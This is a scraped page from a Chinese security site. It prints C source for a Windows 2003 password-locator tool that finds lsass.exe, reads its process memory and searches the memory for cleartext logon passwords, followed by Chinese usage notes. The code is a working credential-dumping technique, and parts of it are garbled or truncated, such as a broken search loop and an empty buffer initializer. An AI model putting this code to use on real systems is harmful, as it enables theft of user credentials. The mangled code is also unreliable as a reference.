|
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论 >{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i 0)
{
Password[Count++] =
Buffer[j];
}
else
{
break;
}
}
return i + 7; // One
Flag To Indicate We Find The Password
}
}
}
return -1; //
Well,We Fail To Find The Password,And This Always Happens
}
// End
Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
//
Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess =
NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(
hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap
Shot\n");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return
0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID =
pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap,
&pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
//
Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char
Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if
(hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 *
1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To
Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0)
// We May Find The Password
{
if (strlen(Password) > 0) // Yes,We
Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",Found +
BaseAddress,Password);
}
}
else
{
printf("Fail To Find The
Password\n");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return
(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End
Is2003()
// End Of File
附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
用法:
1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
2.Locator 用户名 密码 ->
在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。 上一页 [1] [2]
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)